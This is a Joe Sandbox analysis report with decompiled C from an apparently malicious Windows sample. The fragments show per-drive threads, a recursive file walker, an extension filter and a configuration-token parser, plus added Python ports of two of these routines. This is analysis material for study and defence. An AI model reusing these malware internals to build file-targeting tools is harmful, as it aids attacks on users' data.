                                        				_v960 = 0;
                                        				asm("movlpd [esp+0x38], xmm0");
                                        				asm("movlpd [esp+0x30], xmm0");
                                        				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
                                        				_t75 = GetTickCount();
                                        				asm("xorps xmm0, xmm0");
                                        				_t115 = _v948;
                                        				_v932 = _t75 - _v968;
                                        				_t77 = 0;
                                        				_v964 = 0;
                                        				asm("movlpd [esp+0x40], xmm0");
                                        				if(_t88 < 2) {
                                        					_t95 = _v940;
                                        					_t106 = _v944;
                                        				} else {
                                        					_t26 = _t88 - 2; // -1
                                        					_t92 = _v940;
                                        					_t82 =  &_v612;
                                        					_t101 = (_t26 >> 1) + 1;
                                        					_v968 = _t101;
                                        					_v928 = _t101 + _t101;
                                        					_t106 = _v944;
                                        					do {
                                        						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
                                        						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
                                        						asm("adc edi, [eax-0x14]");
                                        						_t115 = _t115 +  *_t82;
                                        						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
                                        						asm("adc edx, [eax+0x4]");
                                        						_t82 = _t82 + 0x30;
                                        						_t41 =  &_v968;
                                        						 *_t41 = _v968 - 1;
                                        					} while ( *_t41 != 0);
                                        					_t77 = _v928;
                                        					_v968 = _t92;
                                        					_t88 = _v952;
                                        					_t95 = _v968;
                                        				}
                                        				if(_t77 >= _t88) {
                                        					_t89 = _v916;
                                        				} else {
                                        					_t80 = _t77 + _t77 * 2;
                                        					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
                                        					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
                                        				}
                                        				asm("adc edx, edi");
                                        				asm("adc edx, eax");
                                        				return E0FC65670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
                                        			}

                                        Instruction addresses (one per decompiled line above): 0x0fc63e26, 0x0fc63e38, 0x0fc63e3c, 0x0fc63e40, 0x0fc63e4b, 0x0fc63e4e, 0x0fc63e50, 0x0fc63e53, 0x0fc63e58, 0x0fc63e5c, 0x0fc63e61, 0x0fc63e6b, 0x0fc63e6f, 0x0fc63e76, 0x0fc63e80, 0x0fc63e84, 0x0fc63e8a, 0x0fc63e93, 0x0fc63ea2, 0x0fc63ea5, 0x0fc63eb2, 0x0fc63eb5, 0x0fc63ebb, 0x0fc63ec2, 0x0fc63ecf, 0x0fc63ed3, 0x0fc63ed4, 0x0fc63ed4, 0x0fc63ed7, 0x0fc63ed8, 0x0fc63ee6, 0x0fc63eea, 0x0fc63eed, 0x0fc63ef7, 0x0fc63eff, 0x0fc63f05, 0x0fc63f0b, 0x0fc63f11, 0x0fc63f1b, 0x0fc63f22, 0x0fc63f26, 0x0fc63f2a, 0x0fc63f2c, 0x0fc63f34, 0x0fc63f3d, 0x0fc63f9c, 0x0fc63fa0, 0x0fc63f3f, 0x0fc63f3f, 0x0fc63f42, 0x0fc63f48, 0x0fc63f4f, 0x0fc63f50, 0x0fc63f57, 0x0fc63f5b, 0x0fc63f60, 0x0fc63f67, 0x0fc63f6a, 0x0fc63f6e, 0x0fc63f78, 0x0fc63f7a, 0x0fc63f7e, 0x0fc63f81, 0x0fc63f84, 0x0fc63f84, 0x0fc63f84, 0x0fc63f8a, 0x0fc63f8e, 0x0fc63f92, 0x0fc63f96, 0x0fc63f96, 0x0fc63fa6, 0x0fc63fca, 0x0fc63fa8, 0x0fc63fa8, 0x0fc63fb2, 0x0fc63fb6, 0x0fc63fbd, 0x0fc63fd4, 0x0fc63fd8, 0x0fc63ff6

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0FC63E40
                                        • GetTickCount.KERNEL32 ref: 0FC63E65
                                        • GetDriveTypeW.KERNEL32(?), ref: 0FC63E8A
                                        • CreateThread.KERNEL32 ref: 0FC63EC9
                                        • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0FC63F0B
                                        • GetTickCount.KERNEL32 ref: 0FC63F11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                        • String ID: ?:\
                                        • API String ID: 458387131-2533537817
                                        • Opcode ID: 7902257db66c6c0258cc6846b0836076487276a7efa3cc2a8d77a32b13e3ad34
                                        • Instruction ID: ca0a2670b81c09a896fd1c79db1d6cfa567c8f60d5aff7887960ad6b60822724
                                        • Opcode Fuzzy Hash: 7902257db66c6c0258cc6846b0836076487276a7efa3cc2a8d77a32b13e3ad34
                                        • Instruction Fuzzy Hash: 7A5124709083419FC310CF19C885B5ABBE5FF88325F504A2DFA89AB391D775A944CB96
                                        Uniqueness
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC66DE0(void* _a4) {
                                        				intOrPtr _v0;
                                        				intOrPtr _v4;
                                        				long _v8;
                                        				intOrPtr _v12;
                                        				void* _v16;
                                        				struct _CRITICAL_SECTION _v40;
                                        				WCHAR* _t12;
                                        				void* _t22;
                                        
                                        				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                        				_t22 = _a4;
                                        				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
                                        				InitializeCriticalSection( &_v40);
                                        				_v12 = 0x2710;
                                        				_v8 = 0;
                                        				_v4 = 0xffffffff;
                                        				_v0 = 0xffffffff;
                                        				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
                                        				E0FC66C90(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
                                        				VirtualFree(_t22, 0, 0x8000);
                                        				ExitThread(0);
                                        			}

                                        Instruction addresses (one per decompiled line above): 0x0fc66df9, 0x0fc66dff, 0x0fc66e0e, 0x0fc66e1c, 0x0fc66e30, 0x0fc66e38, 0x0fc66e40, 0x0fc66e48, 0x0fc66e56, 0x0fc66e6b, 0x0fc66e7b, 0x0fc66e83

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0FC66DF9
                                        • wsprintfW.USER32 ref: 0FC66E0E
                                        • InitializeCriticalSection.KERNEL32(?), ref: 0FC66E1C
                                        • VirtualAlloc.KERNEL32 ref: 0FC66E50
                                          • Part of subcall function 0FC66C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66CC3
                                          • Part of subcall function 0FC66C90: lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66CDB
                                          • Part of subcall function 0FC66C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66CE5
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0FC66E7B
                                        • ExitThread.KERNEL32 ref: 0FC66E83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                        • String ID: %c:\
                                        • API String ID: 1988002015-3142399695
                                        • Opcode ID: b9ec68e84a49d8627d71df87c56442aa97a2709546719911ac9955738f00ec6a
                                        • Instruction ID: c52feb5618f391298aa6c6f802b1177dff22310ac2cece5dacdc3a5a13e55e41
                                        • Opcode Fuzzy Hash: b9ec68e84a49d8627d71df87c56442aa97a2709546719911ac9955738f00ec6a
                                        • Instruction Fuzzy Hash: FE0184B5148301BFE7109F55DC8BF167BA8EB44B21F004614FB65AD1C1D7B89514CBAA
                                        Uniqueness
                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0FC66850(WCHAR* __ecx) {
                                        				intOrPtr _v8;
                                        				signed int _t11;
                                        				void* _t20;
                                        				void* _t23;
                                        				signed int _t26;
                                        				signed int _t27;
                                        				intOrPtr _t28;
                                        				void* _t31;
                                        				signed short* _t35;
                                        				WCHAR* _t38;
                                        				WCHAR* _t40;
                                        				void* _t44;
                                        
                                        				_push(__ecx);
                                        				_t38 = __ecx;
                                        				if( *0xfc72a60 != 0) {
                                        					_t11 = lstrlenW(__ecx);
                                        					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
                                        					if(_t11 == 0) {
                                        						L7:
                                        						return 1;
                                        					} else {
                                        						while( *_t40 != 0x2e) {
                                        							_t40 = _t40 - 2;
                                        							_t11 = _t11 - 1;
                                        							if(_t11 != 0) {
                                        								continue;
                                        							}
                                        							break;
                                        						}
                                        						if(_t11 != 0) {
                                        							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
                                        							wsprintfW(_t23, L"%s ", _t40);
                                        							_t35 =  *0xfc72a60; // 0x0
                                        							_t28 = 0;
                                        							_v8 = 0;
                                        							if( *_t23 == 0) {
                                        								L20:
                                        								_t29 =  !=  ? 1 : _t28;
                                        								_v8 =  !=  ? 1 : _t28;
                                        							} else {
                                        								_t26 =  *_t35 & 0x0000ffff;
                                        								if(_t26 != 0) {
                                        									_t44 = _t35 - _t23;
                                        									do {
                                        										_t20 = _t23;
                                        										if(_t26 == 0) {
                                        											L16:
                                        											if( *_t20 == 0) {
                                        												goto L19;
                                        											} else {
                                        												goto L17;
                                        											}
                                        										} else {
                                        											while(1) {
                                        												_t27 =  *_t20 & 0x0000ffff;
                                        												if(_t27 == 0) {
                                        													break;
                                        												}
                                        												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
                                        												if(_t31 != 0) {
                                        													goto L16;
                                        												} else {
                                        													_t20 = _t20 + 2;
                                        													if( *(_t44 + _t20) != _t31) {
                                        														continue;
                                        													} else {
                                        														goto L16;
                                        													}
                                        												}
                                        												goto L21;
                                        											}
                                        											L19:
                                        											_t28 = 0;
                                        											goto L20;
                                        										}
                                        										goto L21;
                                        										L17:
                                        										_t26 = _t35[1] & 0x0000ffff;
                                        										_t35 =  &(_t35[1]);
                                        										_t44 = _t44 + 2;
                                        									} while (_t26 != 0);
                                        								}
                                        							}
                                        							L21:
                                        							VirtualFree(_t23, 0, 0x8000);
                                        							return _v8;
                                        						} else {
                                        							goto L7;
                                        						}
                                        					}
                                        				} else {
                                        					return 1;
                                        				}
                                        			}

                                        Instruction addresses (one per decompiled line above; 0x00000000 marks lines with no own instruction, such as labels and gotos): 0x0fc66853, 0x0fc6685c, 0x0fc6685e, 0x0fc66872, 0x0fc66877, 0x0fc6687c, 0x0fc66890, 0x0fc6689a, 0x0fc66880, 0x0fc66880, 0x0fc66886, 0x0fc66889, 0x0fc6688a, 0x00000000, 0x00000000, 0x00000000, 0x0fc6688a, 0x0fc6688e, 0x0fc668b7, 0x0fc668bf, 0x0fc668c5, 0x0fc668cb, 0x0fc668d0, 0x0fc668d6, 0x0fc66922, 0x0fc66929, 0x0fc6692c, 0x0fc668d8, 0x0fc668d8, 0x0fc668de, 0x0fc668e2, 0x0fc668e4, 0x0fc668e4, 0x0fc668e9, 0x0fc66909, 0x0fc6690d, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0fc668eb, 0x0fc668f0, 0x0fc668f0, 0x0fc668f6, 0x00000000, 0x00000000, 0x0fc668fc, 0x0fc668fe, 0x00000000, 0x0fc66900, 0x0fc66900, 0x0fc66907, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0fc66907, 0x00000000, 0x0fc668fe, 0x0fc66920, 0x0fc66920, 0x00000000, 0x0fc66920, 0x00000000, 0x0fc6690f, 0x0fc6690f, 0x0fc66913, 0x0fc66916, 0x0fc66919, 0x0fc6691e, 0x0fc668de, 0x0fc6692f, 0x0fc66937, 0x0fc66946, 0x00000000, 0x00000000, 0x00000000, 0x0fc6688e, 0x0fc66860, 0x0fc66869, 0x0fc66869

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0FC6698A), ref: 0FC66872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: %s
                                        • API String ID: 1659193697-4273690596
                                        • Opcode ID: eef2d063c5348654a71e739c050e08591778e8e6e0089f1a9532e8f230ce1719
                                        • Instruction ID: 61e7be34d94ff242de21a70088ed054468adfc052da7d4bb0d63ceb9f9388b3a
                                        • Opcode Fuzzy Hash: eef2d063c5348654a71e739c050e08591778e8e6e0089f1a9532e8f230ce1719
                                        • Instruction Fuzzy Hash: C4213732A1822597D7305B2D9C827B273ECEB84321F44422AED469F281E7B56A50A3D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E0FC66D09() {
                                        				intOrPtr* _t34;
                                        				intOrPtr* _t38;
                                        				void* _t40;
                                        				WCHAR* _t46;
                                        				void* _t51;
                                        
                                        				do {
                                        					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
                                        						lstrcatW(_t46, _t51 - 0x238);
                                        						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
                                        							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
                                        							 *_t38 =  *_t38 + E0FC66950(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
                                        							asm("adc [ebx+0x4], edx");
                                        							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
                                        							if(__eflags <= 0) {
                                        								if(__eflags < 0) {
                                        									L8:
                                        									_t34 =  *((intOrPtr*)(_t51 + 0xc));
                                        									 *_t34 =  *_t34 + 1;
                                        									__eflags =  *_t34;
                                        								} else {
                                        									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
                                        									if(__eflags < 0) {
                                        										goto L8;
                                        									}
                                        								}
                                        							}
                                        						} else {
                                        							E0FC66C90(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
                                        						}
                                        						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
                                        					}
                                        				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
                                        				FindClose( *(_t51 - 8));
                                        				return 0;
                                        			}

                                        Disassembly listing (only the address column survived extraction): 0x0fc66d10 to 0x0fc66ddc

                                        APIs
                                        • lstrcmpW.KERNEL32(?,0FC6FEC8,?,?), ref: 0FC66D1C
                                        • lstrcmpW.KERNEL32(?,0FC6FECC,?,?), ref: 0FC66D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0FC66D48
                                        • lstrcatW.KERNEL32(00000000,0FC6FEFC), ref: 0FC66D59
                                          • Part of subcall function 0FC66C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66CC3
                                          • Part of subcall function 0FC66C90: lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66CDB
                                          • Part of subcall function 0FC66C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66CE5
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FC66DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0FC66DCE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 2032009209-0
                                        • Opcode ID: 2ef74136d9641d58696ec15159d3a1880ea2e3b4a4c1542e6a315b2ce46cc326
                                        • Instruction ID: 60533b80be274da4150b7e3112d6263ae629d81a6240d1694fc9101b95e4bad8
                                        • Opcode Fuzzy Hash: 2ef74136d9641d58696ec15159d3a1880ea2e3b4a4c1542e6a315b2ce46cc326
                                        • Instruction Fuzzy Hash: 0B01563160821EABCF11AB71DC8ABEE7BB8FF44701F004065F905E5011EB359B51EB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%
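Added example, not part of the Joe Sandbox report or of the sample's own code: a Python port of the enumeration loop decompiled above as E0FC66D09 (with its recursion through E0FC66C90). The sample appends each cFileName to one path buffer with lstrcatW (no length check), recurses when the FILE_ATTRIBUTE_DIRECTORY bit (0x10) is set in the WIN32_FIND_DATAW, otherwise hands the file to E0FC66950 and adds its return value to a 64-bit total (the `adc [ebx+0x4], edx`), bumping a second counter only when that total grew. `on_file`, `make_constructed_tree` and the sizes it writes are this example's own constructions; os.scandir stands in for FindFirstFileW/FindNextFileW.

```python
import os
import tempfile
from typing import Callable, List, Tuple


def enumerate_tree(root: str, on_file: Callable[[str], int]) -> Tuple[int, int]:
    """Walk `root` the way E0FC66D09 does and return (total, processed).

    total     mirrors the 64-bit sum kept at *_t38 (add lo; adc [ebx+4], edx)
    processed mirrors the counter at *(_t51+0xc), incremented only when the
              running total grew, i.e. when on_file returned non-zero
    """
    total = 0
    processed = 0
    path: List[str] = [root]  # the sample grows one path buffer and truncates it afterwards

    def walk_directory() -> None:
        nonlocal total, processed
        # E0FC66C90: lstrcatW(buf, "\\*") then FindFirstFileW; here: list the directory
        with os.scandir(os.path.join(*path)) as entries:
            for entry in entries:
                if entry.name in (".", ".."):          # the two lstrcmpW tests (scandir already omits these)
                    continue
                path.append(entry.name)                # lstrcatW(buf, cFileName)
                if entry.is_dir(follow_symlinks=False):  # dwFileAttributes & 0x10
                    walk_directory()                   # lstrcatW(buf, "\\") and recurse
                else:
                    before = total
                    # E0FC66950's return value is added to the 64-bit total with carry
                    total = (total + on_file(os.path.join(*path))) & 0xFFFFFFFFFFFFFFFF
                    if before < total:                 # the hi/lo compare after the adc
                        processed += 1
                path.pop()                             # *(saved end) = 0 cuts the name back off

    walk_directory()
    return total, processed


def file_size_bytes(full_path: str) -> int:
    """Stand-in for E0FC66950: report the file's size so the total is a byte count."""
    return os.path.getsize(full_path)


def make_constructed_tree() -> str:
    """Build a small constructed directory tree for the demo (not a real victim layout)."""
    root = tempfile.mkdtemp(prefix="enum_demo_")
    os.makedirs(os.path.join(root, "docs", "archive"))
    os.makedirs(os.path.join(root, "empty"))
    for rel, size in (("a.txt", 10), ("docs/b.doc", 300),
                      ("docs/archive/c.bin", 4096), ("docs/zero.tmp", 0)):
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(b"A" * size)
    return root


if __name__ == "__main__":
    demo_root = make_constructed_tree()
    print(enumerate_tree(demo_root, file_size_bytes))  # the zero-length file is walked but not counted
```

The zero-length file shows the counting rule the decompiler left as a compare of `*(_t38+4)` with itself: a file whose callback contributes nothing does not advance the second counter.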

                                        C-Code - Quality: 100%
                                        			E0FC63200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
                                        				char _t5;
                                        				char _t6;
                                        				intOrPtr _t8;
                                        				int _t10;
                                        				CHAR* _t13;
                                        				int _t15;
                                        				void* _t18;
                                        				CHAR* _t21;
                                        				CHAR* _t23;
                                        
                                        				_t23 = _a4;
                                        				_t18 = __ecx;
                                        				_t5 =  *_t23;
                                        				if(_t5 == 0) {
                                        					L4:
                                        					_t6 =  *_t23;
                                        					if(_t6 == 0x7d) {
                                        						goto L10;
                                        					} else {
                                        						_t21 = _t23;
                                        						if(_t6 != 0) {
                                        							while( *_t21 != 0x7d) {
                                        								_t21 =  &(_t21[1]);
                                        								if( *_t21 != 0) {
                                        									continue;
                                        								} else {
                                        								}
                                        								goto L12;
                                        							}
                                        							 *_t21 = 0;
                                        						}
                                        						L12:
                                        						_t8 = _a8;
                                        						if(_t8 != 1) {
                                        							if(_t8 == 2) {
                                        								_t10 = lstrlenA(_t23);
                                        								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
                                        								 *(_t18 + 8) = _t13;
                                        								goto L16;
                                        							}
                                        						} else {
                                        							_t15 = lstrlenA(_t23);
                                        							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
                                        							 *(_t18 + 4) = _t13;
                                        							L16:
                                        							if(_t13 != 0) {
                                        								lstrcpyA(_t13, _t23);
                                        							}
                                        						}
                                        						 *_t21 = 0x7d;
                                        						return 1;
                                        					}
                                        				} else {
                                        					while(_t5 != 0x7d) {
                                        						_t23 =  &(_t23[1]);
                                        						if(_t5 == 0x3d) {
                                        							goto L4;
                                        						} else {
                                        							_t5 =  *_t23;
                                        							if(_t5 != 0) {
                                        								continue;
                                        							} else {
                                        								goto L4;
                                        							}
                                        						}
                                        						goto L19;
                                        					}
                                        					L10:
                                        					return 0;
                                        				}
                                        				L19:
                                        			}

                                        Disassembly listing (only the address column survived extraction): 0x0fc63205 to 0x0fc632a5

                                        APIs
                                        • lstrlenA.KERNEL32(0FC652F0,00000000,?,0FC652F1,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63251
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC6325B
                                        • HeapAlloc.KERNEL32(00000000,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63262
                                        • lstrlenA.KERNEL32(0FC652F0,00000000,?,0FC652F1,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63273
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC6327D
                                        • HeapAlloc.KERNEL32(00000000,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63284
                                        • lstrcpyA.KERNEL32(00000000,0FC652F0,?,0FC634BF,0FC652F1,00000001,0FC652F1,00000000,00000000,74CB6980,?,?,0FC652F0,00000000), ref: 0FC63293
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                        • String ID:
                                        • API String ID: 511007297-0
                                        • Opcode ID: 0d924dad90123f63d28110253685045161254870773bd426647fd137a69d99d7
                                        • Instruction ID: eadb90396c8a1a76bfb5d33cc7056608b7ae986f060dac8eade28fe7775c5397
                                        • Opcode Fuzzy Hash: 0d924dad90123f63d28110253685045161254870773bd426647fd137a69d99d7
                                        • Instruction Fuzzy Hash: B211087000C2D5AFEB200F69988A7B6BF58EF02325F644006FAC5DB343C739A56687B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%
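Added example, not part of the Joe Sandbox report or of the sample's own code: a Python port of E0FC63200, the `key=value}` token parser decompiled above. The routine scans for 0x3D ('=') and 0x7D ('}'), temporarily writes a NUL over the '}' so lstrlenA/lstrcpyA see just the value, copies it into a HeapAlloc buffer stored at ctx+4 (when `_a8` is 1) or ctx+8 (when it is 2), and then writes '}' back. The names `field4`/`field8` for those two offsets and all sample tokens are this example's own. The port keeps the routine's quirk: when no closing brace exists, the final `*_t21 = 0x7d` lands on the string's NUL terminator.

```python
from typing import Dict

EQUALS, RBRACE = 0x3D, 0x7D  # the two delimiters tested by E0FC63200


def c_string(buf: bytearray, pos: int) -> bytes:
    """Read a NUL-terminated C string starting at buf[pos]."""
    end = buf.find(b"\x00", pos)
    return bytes(buf[pos:end if end >= 0 else len(buf)])


def extract_value(buf: bytearray, pos: int, which: int, obj: Dict[str, bytes]) -> int:
    """Port of E0FC63200(ctx=obj, token=buf+pos, which).

    buf must carry a NUL terminator after pos, as the C string did.
    Returns 1 after storing the value, 0 when a '}' is met before the '='
    or the value is empty ("key=}").
    """
    p = pos
    c = buf[p]
    if c != 0:
        while True:
            if c == RBRACE:            # L10: closing brace before '=' -> no value
                return 0
            p += 1
            if c == EQUALS:            # L4 with p just past the '='
                break
            c = buf[p]
            if c == 0:                 # L4 with p on the terminator
                break
    c = buf[p]                         # L4
    if c == RBRACE:
        return 0
    q = p
    if c != 0:
        while buf[q] != RBRACE:        # find the closing brace ...
            q += 1
            if buf[q] == 0:            # ... or give up at the terminator (L12, nothing written)
                break
        else:
            buf[q] = 0                 # terminate the value in place for lstrlenA/lstrcpyA
    value = c_string(buf, p)           # L12: lstrlenA + HeapAlloc + lstrcpyA
    if which == 1:
        obj["field4"] = value          # stored at ctx+4
    elif which == 2:
        obj["field8"] = value          # stored at ctx+8
    buf[q] = RBRACE                    # restores the '}' when one was found; with no '}' this
    return 1                           # overwrites the NUL terminator (the sample's quirk)


def parse_token(token: bytes, which: int = 1) -> Dict[str, bytes]:
    """Convenience wrapper: parse one constructed token and return what was stored."""
    buf = bytearray(token) + b"\x00"
    obj: Dict[str, bytes] = {}
    extract_value(buf, 0, which, obj)
    return obj


if __name__ == "__main__":
    print(parse_token(b"key=value}tail"))        # {'field4': b'value'}
    print(parse_token(b"noequals}"))             # {}
    print(parse_token(b"key=abc", which=2))      # {'field8': b'abc'}
```

Because the value is cut out by writing into the token buffer itself, a caller that keeps a pointer into the same configuration string sees '}' where its terminator used to be once an unterminated token has been parsed.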

                                        APIs
                                        • _memset.LIBCMT ref: 0FC63B72
                                        • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FC63B96
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FC63B9A
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FC63B9E
                                        • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FC63BC5
                                        These arguments are the VersionHelpers-style IsWindowsVersionOrGreater pattern: 0x11C is sizeof(OSVERSIONINFOEXW), dwTypeMask 0x23 is VER_MAJORVERSION | VER_MINORVERSION | VER_SERVICEPACKMAJOR, and the three chained VerSetConditionMask calls each use VER_GREATER_EQUAL (3) for type 2 (major), 1 (minor) and 0x20 (service pack major). The version values compared against are not visible in this listing.
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
